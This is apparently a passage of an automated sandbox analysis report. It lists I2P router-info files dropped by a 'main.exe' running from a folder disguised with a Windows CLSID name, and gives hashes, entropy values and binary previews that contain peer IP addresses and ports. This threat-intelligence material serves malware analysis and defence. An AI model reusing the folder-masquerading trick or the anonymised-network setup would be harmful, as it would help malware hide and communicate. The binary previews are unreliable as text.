Q=;.v=.2;..,.caps=.OR;.netId=.2;.router.version=.0.9.62;..C{._.... BR....S....5G.ua2...2..1=..<.1.ek.1+.>..S...u...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rN\routerInfo-nVDSEGcvgX9fkeUIY0b-96tMYy~bT14uTU5KKdqyUgo=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	811
Entropy (8bit):	7.36869069738508
Encrypted:	false
SSDEEP:	12:w+6yRegTnHI+wKWm/6fCtYLscSgXhDtLekIBJxytLekXyrJOyFpL7hqj+EWH:wjyRzHQKWmxGL8cDtfI5ytfXygG
MD5:	7AD32A38EE4CB29887601DCD01568F70
SHA1:	3C6AA28AC95A9E32695D88C4118E1ED26DA92DD5
SHA-256:	6BEF8E13A4BA2A260666A84A39FC0B4EE59820361FEE1FEFAD4C4B0228F806E5
SHA-512:	E0742DE931D010DB403A2BEB213A8E9ABBD8C5DA15E42DD94283FE0E1052F2E2068835C6CA6972C6850AD9E4B0C10E6AED2215804C603D1C28F309AE76E292B7
Malicious:	false
Preview:	w.k#..[.@.....`lB;#.....G!...r.>y......'+o.6.......XK.g..%...w..M..............E..i~.....{79t.8. -...b.4_X......D.e.8]6.6I...l..<x.:..x.."e....{..+~C.........@........y.~..A.S.b2H..+.....q.#.S.u.dihM......)U...3vg.1x .Q6... h"....c1..R.%.Zd......Vj...i)t.......B.>.U.b...uA.5)?......Q.vA.+...E...".\.NF.....^J...R.m..L.:.^...GE?d....jO,.'uA.4.NzO.-.J.6gPp.&.D1.............................NTCP2.v.host=.198.37.222.72;.i=.8EUJxzKWvpyB3B5qclUjZA==;.port=.25083;.s=,XynNsUpOL8fjopqvLMaCnZBWLWmlnYf-KVns3XfT1nM=;.v=.2;..........SSU2...caps=.BC;.host=.198.37.222.72;.i=,vcKr-eRB3NsSmvsOlVgNzt8N3ura66Fi2aOotZGBP~A=;.port=.25083;.s=,GueA2WcpE233t3M798uWxoaH3ngzbCbHpqarILcc0Dc=;.v=.2;..-.caps=.PRE;.netId=.2;.router.version=.0.9.63;.S.p.\...\%..*!...Z....CE4..@..3I.'.Q..._V...f8.....M\|.0....G.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rO\routerInfo-OJCvh2QqNfBpV5bJxCUINokNK8e1N25JsfEHNwsqsr8=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	810
Entropy (8bit):	6.697573301874222
Encrypted:	false
SSDEEP:	12:WB2d76vCvCvCvCvCvCvCvCvCdlDV9bI3wy0h3f/69bISF4SszrA/TvUWn:WMB6666666666dlDVTyyH6dF4Sgs/bL
MD5:	915BC5E3F3236F94DD6CECECE21A20CB
SHA1:	65C1C453242D078ED31F08350C5E0E4ABF508B13
SHA-256:	042F9DFA9F15DF9DC795F903A11977288C36158916A257DDB1E117BF81BAAF0B
SHA-512:	0120326A436514E2A59E807206C06F018DC5245BF11719A46ADCCE46E8EB2E428B41F4654D5508FE94DEDFC696E8C932C59747C6EE37796DF9FD859AD97604C7
Malicious:	false
Preview:	,...~."....*..[.X.v.. 3D..:\|...~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U.....~s......5av{8w..?.].4...1.U......(Z.....-.g.\..[......I..b0..........................SSU2...caps=.BC;.host=.154.61.58.162;.i=,u0N6SN5HoALaEDr1ul4oB89yDcL2wZF4NunLu5WJa6I=;.port=.23154;.s=,KChyxLmfkJKN0D2jQCpVUCWxuf-jJMt4A2OrneZHXEw=;.v=.2;..........NTCP2.v.host=.154.61.58.162;.i=.QK5jCWCC3I1JOWDSbhqbUg==;.port=.23154;.s=,8AxaAUUX6vpTRN0dTdwHAsHFXUcYcrDfYwXnVkcK0H0=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;vC..Fz:.L........;Z...NQ......n...R.........:.\.BU..Kqg..p.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rO\routerInfo-oOpB~T03pi4nB9fKCHpb5j3UZUzbVGjelh9q60jJJw4=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1081
Entropy (8bit):	6.7114531589648445
Encrypted:	false
SSDEEP:	24:qBhzhzhzhzhzhzhzhzhzhh6qNDdnKqrOyJFS:qBJJJJJJJJJnN1iynS
MD5:	5FC62C6835559036E009577281B94623
SHA1:	7B9E52DF0DCF3F3156944F7687FB39DD110A301C
SHA-256:	DB3B59622DBF9D990F55E67F4A85CB6BB272D5892D35B2132BEC877A6CA95D10
SHA-512:	49BA8E3A9465F709BF8B9C7CCA98EA512C1F4A3C8DB60E2F98B77190358B9B08E54369CC345BD029E09A319498033DA0B79042D4DFCD770EF308C0F4EF214460
Malicious:	false
Preview:	..i2.9..s+.\...oFP0....>Y..4\!B...R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e...........R...2....,}.2^....e............U.2..<g...(y.$...R6..LXF. ..............m............NTCP2.@.caps=.4;.s=,RM6b04kmn0wdvJVZnGgbGs-9~O55Ezh6ZHkBrlYsmEs=;.v=.2;..........NTCP2...host=&2a02:4540:7045:88a8:4a6e:c4e0:755a:29c;.i=.kIADeCvNdU88gMAdXmhjXQ==;.port=.25194;.s=,RM6b04kmn0wdvJVZnGgbGs-9~O55Ezh6ZHkBrlYsmEs=;.v=.2;..........SSU2.q.caps=.4;.i=,fUNLnFn~81KdNTLBhHSJImRGozClqOtu1O-pTEAiwHk=;.s=,thqgM2btB9G~Z-QDWqDycOYthKjjWnOH9if0uHplISc=;.v=.2;..........SSU2...caps=.BC;.host=&2a02:4540:7045:88a8:4a6e:c4e0:755a:29c;.i=,fUNLnFn~81KdNTLBhHSJImRGozClqOtu1O-pTEAiwHk=;.mtu=.1500;.port=.25194;.s=,thqgM2btB9G~Z-QDWqDycOYthKjjWnOH9if0uHplISc=;.v=.2;..,.caps=.PU;.netId=.2;.router

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rQ\routerInfo-QZoKKakinCLu3mV8rLUdDHBMfl41UEIex3N1r8qul80=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1165
Entropy (8bit):	6.7403172500578465
Encrypted:	false
SSDEEP:	12:gpRrdMiiiiiiiii0tz/FIk812TObEyw5GIXhNvUX2DPUKJLQQCTTNgfeXHcA/z8M:gpRrAYF2oE15fvUX8PUGLCvNce3cdG20
MD5:	02732EA9730272F6BFF913676A081288
SHA1:	0369124F2633252913C9DCE1B26B8B4BE6EAAEDF
SHA-256:	449716DB17C2D2092E5609C1DA0BB8179F97B1409DD2C2E166B1560210B3D9D2
SHA-512:	C3A2BC50BFD83B631D0C32E07F04D6026687E79B2141F6800FCDC2EEC77E3D51992287EE0315E9250DE263700C6F0E0E89ED54BF08777B222760FD28957C378E
Malicious:	false
Preview:	...6zB....gwr2..w..T...2=}V;7{...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...I.%..Z"..\.oe.H..S....G..VE...2.....mQM.w7.O#..jwg8)lo.R/...............z...........NTCP2.@.caps=.4;.s=,luXoav965FYJXmxHgYC-uLnArcqaFUC~-nvIr6ppDTo=;.v=.2;..........SSU2.-.caps=.4;.i=,vr7C-cIr5DWOZEkT9Eb~fncZMK-2rYy6KO3sKhRH~cA=;.iexp0=.1726474404;.iexp1=.1726474494;.iexp2=.1726474910;.iexp3=.1726476573;.iexp4=.1726477732;.ih0=,6PZWFOLqMqbKRNbbhwzUt0nicAj3C-JCIEyb12PSBt4=;.ih1=,n6W-sg6JjYoIGkViNYuPbrRqhPyKaCmi9fzJ669gGSE=;.ih2=,x5IrBCNg3-2i5NbhtCQzpTSo-MfIBDpXx3rTET0s5cs=;.ih3=,1raAFupalt1-5x8W9gXdcXlxBiM35C8ff1wMYFrDVqw=;.ih4=,5zKjqFGA6rkrojYRzBY3flFRJfkIMlyYnyuf7dQ8QuM=;.itag0=.641564569;.itag1=.3621157672;.itag2=.4064067248;.itag3=.1218885772;.itag4=.3399425411;.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rQ\routerInfo-QqDdBsXn6dR5hLldVSZPzuWY-caIsk-ifMCYkity0bc=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1019
Entropy (8bit):	6.759679690412713
Encrypted:	false
SSDEEP:	24:++0Bfet7et7et7et7et7et7et7et7et7etJ/QCNOt/RKIqh8WK3qh884LEyE:+bpYLqaX3qa38
MD5:	661BCE6BCD0885BBFEF8A40631D60580
SHA1:	74F1F604E9AA60775FD6207E3D37699A6D8C22C7
SHA-256:	987BAFED043AD4DEF3E692A9DF5E8C40C819174E792A51E54A9562233EFFE8FC
SHA-512:	DED29218EEB192E42C0281A72D9CBFE3E3F94147C3930D66617D349C5345E362182065DF0285560D9A5123DDF8383282AD07D58FDC4286353E8F9EDC95203B28
Malicious:	false
Preview:	....{.~...l.#..%......Q.~.....3.+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p+.b. .....g..&..I.a.R....^ma#.p..].q..l..-..D\|.Qo2.$...V: x\|.;.............J............NTCP2.u.host=.2.177.52.177;.i=.6y7lddThoIGOwOsMJAy5AA==;.port=.14810;.s=,gLb3wAK9LmnvJ8tfp95hcD-i5vAFPRZOWhZjEjHq3Fg=;.v=.2;..........NTCP2.@.caps=.6;.s=,gLb3wAK9LmnvJ8tfp95hcD-i5vAFPRZOWhZjEjHq3Fg=;.v=.2;..........SSU2...caps=.BC;.host=.2.177.52.177;.i=,qHxy2sQWP4yq2P-8OUZGcESzWHjZdCduYiLzQVX36Vk=;.port=.14810;.s=,x64PA8b4r7pcUWbj7Tdeks91i~Z5iyzwc2dI76KJC2I=;.v=.2;..........SSU2.q.caps=.6;.i=,qHxy2sQWP4yq2P-8OUZGcESzWHjZdCduYiLzQVX36Vk=;.s=,x64PA8b4r7pcUWbj7Tdeks91i~Z5iyzwc2dI76KJC2I=;.v=.2;..-.caps=.PRE;.netId=.2;.router.version=.0.9.63;}....E...c.7.z=dW.'...,...........W6).Al

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rQ\routerInfo-QrUo0dwZfuC-iluShmgir30l8VG7-UComFYW8dcsMsg=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	810
Entropy (8bit):	6.740796435234308
Encrypted:	false
SSDEEP:	24:uO8hyPGPGPGPGPGPGPGPGPGPKYRhLqFepIr3OhLFN2gbDnH:uO8hSYRiQa3O1vDH
MD5:	8E011BBC0F03DD159EB9A83E5A98B71F
SHA1:	DF7236C66D68F19E5F976224A6A9180255EA26F3
SHA-256:	9218EEDB41A9DE472CE052AC4A8A45079731B7FCBA503C849E002BCBE92C4A3B
SHA-512:	361471552FBA8A387198809BD74C98EE80910A5D1D62BB9F6955B36F852E205EE223FDDCFD9023F00A11617DA05A96A746B4E6C5BF32B1C20696120B5299433F
Malicious:	false
Preview:	..ezj.....u.Y..4PL.DJj..~?b.*..s...\...m........R.C...~..\|.s...\...m........R.C...~..\|.s...\...m........R.C...~..\|.s...\...m........R.C...~..\|.s...\...m........R.C...~..\|.s...\...m........R.C...~..\|.s...\...m........R.C...~..\|.s...\...m........R.C...~..\|.s...\...m........R.C...~..\|.s...\...m........R.C...~..\|...7mAN.M..86.s..f...7QTv...................}...........SSU2...caps=.BC;.host=.188.89.23.222;.i=,EaMjzFWLy4Dbl7GN24030BwS-XnHpO1UK7mF7K8ADZk=;.port=.19229;.s=,olggNl2AeXJmcFcrB-7nlo8hVy8YDtLRWNH6sWFooyY=;.v=.2;..........NTCP2.v.host=.188.89.23.222;.i=.Cncsx5tu-EZe6RWS~2ixxA==;.port=.19229;.s=,Gft4Y03ydgvVd-ANulVUqbe5bXoacRzend6uRS~qr2E=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.63;......i...].........<wGB`Zx]..`....\.........H......Iq...h..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rR\routerInfo-rNg3Y~rBsA2mKohdGheIBWmnowNPHiHYBEftyPoaBNM=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1165
Entropy (8bit):	6.664404206054663
Encrypted:	false
SSDEEP:	24:61wO555555555mZAwtv2aFUAtv2adJjhivUPJjhJI:6t555555555uATfDCLPNI
MD5:	514DB50F2B47F473CFC4AD0FBDE77C9A
SHA1:	9728D9F974806FA3CACBCF32B1A1EF904B32CCD7
SHA-256:	985DC2E973018A66B2B25DFB608194AE92DA3BF2136481997CBC1394F6677882
SHA-512:	54C9E825A04410B53009F1CF5988C720E83D1FEBC382DC90E3C357BEE6F76C32FCC53B84284EDBC0F4339711B5A30F4C04D9DB7CCAB3DFB1F92FC33C565D9F7E
Malicious:	false
Preview:	._...K..5.)q.O.qB..w.T?...I9x]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h]2.....Ie<...N="1..y...M..~.h......gS3....<j.\|7....q..#Y.............................SSU2...caps=.BC;.host='2a02:1748:dd4e:f060:82ee:73ff:fe51:b953;.i=,iHlj9Zze15sS-EHS2yQWOql8Cf1SXBdW8sNgufjAR3w=;.port=.25107;.s=,CkKVpW-~W0HUZ1yaPy7JEGF~OcSP3zVMlNqMFs7sxAA=;.v=.2;..........SSU2...caps=.BC;.host=.185.128.245.162;.i=,iHlj9Zze15sS-EHS2yQWOql8Cf1SXBdW8sNgufjAR3w=;.port=.25107;.s=,CkKVpW-~W0HUZ1yaPy7JEGF~OcSP3zVMlNqMFs7sxAA=;.v=.2;..........NTCP2...host='2a02:1748:dd4e:f060:82ee:73ff:fe51:b953;.i=.lEsGDVaMFBAvavChAlaWSQ==;.port=.25107;.s=,46nykQSwr3Tf3R9rahJ2Dl39guOOyETYsSmB8CjVYlQ=;.v=.2;..........NTCP2.x.host=.185.128.245.162;.i=.lEsGDVaMFBAvavChAlaWSQ==;.port=.25107;.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rU\routerInfo-UmLWAml9Wr73tuVlOt8qZxa6FdRkJJv1dPrOKaUndi0=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	6.690373158991511
Encrypted:	false
SSDEEP:	24:zh4N4N4N4N4N4N4N4N4N4Yb0X2IsCg0X2Isqg9P17/TgIP1oy280X2IsMZr+xeiN:V4N4N4N4N4N4N4N4N4N4YbpRTpRTdGy1
MD5:	0B89A1CD8EE1B6DCBFF4A5E1CE022F62
SHA1:	84DA689BAE144A47DB6586C99B8131D9772F2D87
SHA-256:	4378B64B629DEC883A027D5BB667A27D0A9DD9B325904F7D41C3361A7D47EB53
SHA-512:	901E15A7DC1E525DBB9283ECA6AEFC9DE867CB71B57A7653E8B28A08884C666D2CDD76B3AC4C1F2F4BC981E199F8A034E6FB50A8529E3062667660CCA4570FF4
Malicious:	false
Preview:	.;..?h..Q.t....)........M.%%...&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..&!w..]..{.p...zT?..(.....rX..f..i.../...L..4J..X.....)KF...u...........$..............NTCP2.v.host=.85.239.52.241;.i=.F96vpb5EqevVmLQLeKNtYQ==;.port=.28764;.s=,FeHZpV3M9PaesSBcUwI77-b-TqlVLs7evmZc6IGNInA=;.v=.2;..........NTCP2...host=.2a10:1fc0:5::9e6f:2659;.i=.F96vpb5EqevVmLQLeKNtYQ==;.port=.28764;.s=,FeHZpV3M9PaesSBcUwI77-b-TqlVLs7evmZc6IGNInA=;.v=.2;..........SSU2...caps=.BC;.host=.85.239.52.241;.i=,f~jAbSLkBKsCIRBgmtAPUId~e2kQkq493Ikuwu-dpks=;.port=.28764;.s=,ZFUZx6QsH1ZQpGQUmDXLu0~PFpfX2n~MZ0YVku8L5SQ=;.v=.2;..........SSU2...caps=.BC;.host=.2a10:1fc0:5::9e6f:2659;.i=,f~jAbSLkBKsCIRBgmtAPUId~e2kQkq493Ikuwu-dpks=;.mtu=.1500;.port=.28764;.s=,ZFUZx6QsH1ZQpGQUmDXLu0~P

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rU\routerInfo-UwW6L3nzCSIJ~Tt8BXI8BESJP1ZIel63f~wF6hajOVc=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1198
Entropy (8bit):	6.717112239083693
Encrypted:	false
SSDEEP:	24:kgXRoC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4amW6361QC5rYFI/qFIUERrt1tpSt:kgXGC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4ZH
MD5:	C218A7A18E7F2E7AE2F25503F1BF263F
SHA1:	0535639634601E1FD2FC29F1ACA8EDD071757859
SHA-256:	3EDEF2C7FD73F6FFCF33CF5B232DA7466D0F496B967BA9AF5F6671A6977C907F
SHA-512:	E1450A493018D841D320C6F6E80002A2CBBDB1E2B72593AB1BEF9C46347562BC0F77D7B9AF550BE0CD105CBF37BF07B4483A1E838C60E43407DDD9CF505134E7
Malicious:	false
Preview:	X.Kg.0..S..~...._.<=."..kb.....gK.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#....)yy.H.y.}.K\;Y..4...+%.3..Y..............%............NTCP2.@.caps=.4;.s=,B2ltQ9ui1~Fl6Nl5PAYGco4XgfjIz4LpyWTkuVR-MSY=;.v=.2;..........NTCP2.@.caps=.6;.s=,B2ltQ9ui1~Fl6Nl5PAYGco4XgfjIz4LpyWTkuVR-MSY=;.v=.2;..........SSU2.{.caps=.4;.i=,oygZ1Afk64Q5kMgx2wOEh53WSuhw66rwk91vC4BaSlY=;.iexp0=.1726477524;.iexp1=.1726477514;.iexp2=.1726479178;.ih0=,~yTwCZd52sRiEfRNElRGwsNOiqHzy3LnrRLI7LSB7v0=;.ih1=,WiI-VZmbqNGnm-ZkR7c7AUFf3ofhlgUamXWpqgKVXH8=;.ih2=,Jzw5wbOpn0WaXDyPJZ6ei9a-7Xt4HMxEm-VLii4vrMs=;.itag0=.381221025;.itag1=.3671429319;.itag2=.3666351550;.s=,19GAU9gmXDU1rfBwn6W3nw-N-Ma33rAWfS0VSD-H0ns=;.v=.2;..........SSU2.q.caps=.6;.i=,oygZ1Afk64Q5kM

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rW\routerInfo-W3iR0FrKQfsXr7sSWHoujohRww6tiH7iFWwkEUuGvxc=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1474
Entropy (8bit):	6.6347750075747065
Encrypted:	false
SSDEEP:	24:uizzzzzzzzzwCLCAn3CzPtN+NHwZxmltTfPrgRLYQxHlSZZI7+:LzzzzzzzzzzY7fI/4RJFSfI7+
MD5:	C9CD3EB6390E40DCEA6C2E2645792E45
SHA1:	602FDBAB120B8FEDDC5BECB8ECBD28A5234EBD81
SHA-256:	23C038580A9E0BA4F96DE43BA979D6278B2065EC7117DFE1B6A8061E78BCCC25
SHA-512:	AC01C25CB80D63184A3C8551D9C7F1E7B51833CEBFA0364A2EC83D385223F169F221C1F95FE5FE692C9C12B3270BF98B7D1BD7CDD5D813A9AA05176143497EA6
Malicious:	false
Preview:	..<3...Rd....GW+o....`.......ZC.... ..\|5.jG...v..DyRQWm.>E.._.... ..\|5.jG...v..DyRQWm.>E.._.... ..\|5.jG...v..DyRQWm.>E.._.... ..\|5.jG...v..DyRQWm.>E.._.... ..\|5.jG...v..DyRQWm.>E.._.... ..\|5.jG...v..DyRQWm.>E.._.... ..\|5.jG...v..DyRQWm.>E.._.... ..\|5.jG...v..DyRQWm.>E.._.... ..\|5.jG...v..DyRQWm.>E.._.... ..\|5.jG...v..DyRQWm.>E.._.....G.e..Z..,.p.B,.T].,..>...h..........................NTCP2.@.caps=.4;.s=,~7PXLqowkshXYjDbeHRR-LbW-cv9V0~DZTe3quNw2n4=;.v=.2;..........NTCP2.@.caps=.6;.s=,~7PXLqowkshXYjDbeHRR-LbW-cv9V0~DZTe3quNw2n4=;.v=.2;..........SSU2.z.caps=.4;.i=,tAVnTSSSmnigul6m7W5f4yuramliLAnCzDLOF5gMAGE=;.iexp0=.1726478963;.iexp1=.1726478957;.iexp2=.1726478956;.ih0=,-ZYUuq4kl9vffbV~HBsyOj7jx7BR1DuvCtsttZfPTMA=;.ih1=,~yTwCZd52sRiEfRNElRGwsNOiqHzy3LnrRLI7LSB7v0=;.ih2=,HZHPNSbv7zC6fRDx0e3AQWI6TGVzw9hiqfjJ6e4WRdk=;.itag0=.552072133;.itag1=.3023733026;.itag2=.463003325;.s=,pzhPI0On9ZUnt2H9H4EhsQVpeDBc5icCsx1gysYgtj0=;.v=.2;..........SSU2...caps=.6;.i=,tAVnTSSSmnigul6

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rW\routerInfo-WfMT73sQr8lk3tjSVeWmSLY5H~ao1oNNaCuVRriZ0Lk=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	988
Entropy (8bit):	7.2887732225122575
Encrypted:	false
SSDEEP:	12://QRU1vb5n93f+6/R/wvZmoDvWT+39JDr2eqhxZOXxwiG4jd7bZJ31://QRUjP+8R/wx8Tc9tCeixMXeiG4jRFD
MD5:	57BEB5800391A18586FD515D1CDD1E26
SHA1:	D85BEA0F484119825ED3ACFE580425B0A56C1F95
SHA-256:	BEE4E1B3676AF4A33780F33B20258B1DFF48745727F8E21E5249755ACFAF9D2B
SHA-512:	C201BA973B9750CCBC23B2FEA56B7EE4585F8A3FA396B443001760B8EFD7F08B74B5A11E7ED3AA6637556D3F58DD7859E46DD9203482731FAD1EEE2D59C80522
Malicious:	false
Preview:	..8..".FKU.9..\|..K%r<.%..d.m......N./..-..`...g... .T.`.\..Y.}Z........e.B.>.h,.~.u.i.l....o..+.......4!.5....6......1....T....rXu.%..f>....[a...i...[.....f.WC"..k.k..B.F...4.$.Z..,..>.#.1.......QM.....zV}..4...s.......&....Q.#4.o.f....p.CNqI9).....i.1.v.~..J.S....F.jEQ.W.E.+.Z.......7cD%.\..z^Tm.q@....( .=.....A.#.`r.{.w)....%..a5..T.Hn.Sz...eA........Q...[t.D..........................NTCP2.@.caps=.4;.s=,Kfr77LacuXs7F0GS8CendxTmpiSmR1hPFW9WTsFrvS8=;.v=.2;..........SSU2.\|.caps=.4;.i=,yMITurGqk1pjwJtX~ZMQiap2lttp8oOcjGPIAY8eL3M=;.iexp0=.1726478481;.iexp1=.1726478422;.iexp2=.1726478397;.ih0=,ujeJRIlhNHAUHmiC9y0nLx1gIoOHqEyKMjZByqzhLJ0=;.ih1=,Lid~-zEuyq2zyypj~J9-6QNgmAix6it3DB4EZJbD1O8=;.ih2=,~OTNd-HhgVbQoCBgfAR5Lzi9SFmGglG1~WpQWJS0cxM=;.itag0=.2625313873;.itag1=.2071815743;.itag2=.4154377392;.s=,423V23iOLVkUZ955rSMMGvwTfijOsEuT9meOGA46~lU=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.56;........^....<....B~9.tKt%.<u[...E..h.4.....3e.0I......'h...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rW\routerInfo-wUeVi5dPnAF282g9kxbsDaLB4VQVLP6yIuqWXP6pXes=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	807
Entropy (8bit):	6.689041002120418
Encrypted:	false
SSDEEP:	24:TWw8y8y8y8y8y8y8y8y8y8vn4LBlhLbU9ONu7H:TWJvvvvvvvvvv2zi7H
MD5:	F625D6B1678C08A46964C09E435CBF48
SHA1:	65D752C5B7EB1B8365AC6B86857F2F70E7F43ABB
SHA-256:	9704B50EF9BEA49D00C79AF0CC4BFDAE94FEC36D6E697E380861403AA4407481
SHA-512:	394671753D27402BA4C851E9E682AED22AFBE09D46AA50B17041EB5686391B6FCD2A4DD9FD60D0CBDE19C662C61DDEDD1DADC169030A3502554DEFF16AD6FAFE
Malicious:	false
Preview:	).!...Rs"t.Y.S._Ze.,A;W.W%...p-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88. ...n...~.]\....l..^..../N...............q...........NTCP2.u.host=.68.65.178.44;.i=.UenFJERPzXaMSXrI0S56xg==;.port=.23154;.s=,Xxp8UpvBDdwvHHtzrGJ1g3nCUPC~Jc9gCTTpBhRyHy4=;.v=.2;..........SSU2...caps=.B;.host=.68.65.178.44;.i=,gZuNU9hvrHR0cH0mE-RFAAo~DVFW0KKJlqnBWLKt0Xc=;.port=.23154;.s=,zDPU8ZgJT6AijgUE8b4FnjSbRLKBjJFWu2a03IqvCAM=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.61;.j....(.o..Y./G{6.../.i.%m&.A....=..x...y.d.$z..Eq..&$m.....\.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rX\routerInfo-XyCoqcUxraFQg6sbbrejDgojpJdC2p-24jzyfDblBT8=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	981
Entropy (8bit):	7.219148852221832
Encrypted:	false
SSDEEP:	24:nmpp5n7b6Rw74vFB+/MKmau3GQdoq3GplSsuOs:m57bwQGFmeau3P6q32lpns
MD5:	E7DDFD5A807921940EA31AB4B0AF3527
SHA1:	C8ABBA4C1166B6424230232E9C56719BBB3FF085
SHA-256:	2910A481762312754C4BB457F0C56AE6B3FB40CC120A21BDCAD14C7EB86F9371
SHA-512:	167B7A312899635AC6544876F828696D155A27C4FA933889396FDE9353255DCDF697999E1F6785BD010CD56F1C26551229CD4C944EE9351932D297883C7D445E
Malicious:	false
